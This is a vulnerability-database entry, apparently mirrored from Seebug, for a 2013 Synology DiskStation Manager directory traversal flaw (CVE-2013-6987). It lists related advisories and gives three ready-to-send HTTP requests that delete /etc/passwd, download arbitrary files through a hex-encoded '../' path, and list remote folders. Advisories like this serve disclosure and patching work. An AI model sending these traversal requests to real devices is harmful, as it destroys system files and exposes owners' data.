Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Synology DSM目录遍历漏洞

🗓️ 25 Dec 2013 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 601 Views

Synology DSM directory traversal vulnerability. Exploit examples: delete /etc/passwd, arbitrary file download, remote file list

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Synology DSM 4.3-3810 - Directory Traversal
24 Dec 201300:00
zdt
CVE		CVE-2013-6987
31 Dec 201315:00
cve
Cvelist		CVE-2013-6987
31 Dec 201315:00
cvelist
NVD		CVE-2013-6987
31 Dec 201316:04
nvd
Packet Storm		Synology DSM 4.3-3810 Directory Traversal
23 Dec 201300:00
packetstorm
Prion		Directory traversal
31 Dec 201316:04
prion
Positive Technologies		PT-2013-6222 · Synology · Synology Diskstation Manager
31 Dec 201300:00
ptsecurity
securityvulns		CVE-2013-6955 Synology DSM remote code execution
27 Mar 201400:00
securityvulns
securityvulns		Synology DiskStation Manager code execution
27 Mar 201400:00
securityvulns
Tenable Nessus		Synology DiskStation Manager < 4.3-3810 Update 3 Multiple FileBrowser Component Directory Traversal Vulnerabilities
5 Feb 201400:00
nessus
Rows per page

                                                Following some examples (&quot;test&quot; is a valid folder name):
 
- Delete /etc/passwd
===========================================
POST /webapi/FileStation/file_delete.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 103
Cookie: stay_login=0; id=kjuYI0HvD92m6
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
 
path=/test/../../etc/passwd&amp;accurate_progress=true&amp;api=SYNO.FileStation.Delete&amp;method=start&amp;version=1
===========================================
 
- Arbitrary file download:
===========================================
GET /fbdownload/?dlink=2f746573742f2e2e2f2e2e2f6574632f706173737764 HTTP/1.1
Host: 192.168.56.101:5000
Connection: keep-alive
Authorization: Basic XXXXXXXX
===========================================
 
2f746573742f2e2e2f2e2e2f6574632f706173737764 -&gt; /test/../../etc/passwd
 
- Remote file list:
=========================
POST /webapi/FileStation/file_share.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
Content-Length: 75
Cookie: stay_login=0; id=f9EThJSyRaqJM; BCSI-CS-36db57a1c38ce2f6=2
 
folder_path=/test/../../tmp&amp;api=SYNO.FileStation.List&amp;method=list&amp;version=1

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Dec 2013 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.30235
synology dsmdirectory traversalvulnerabilityexploitdeletearbitraryfile downloadremotelist
601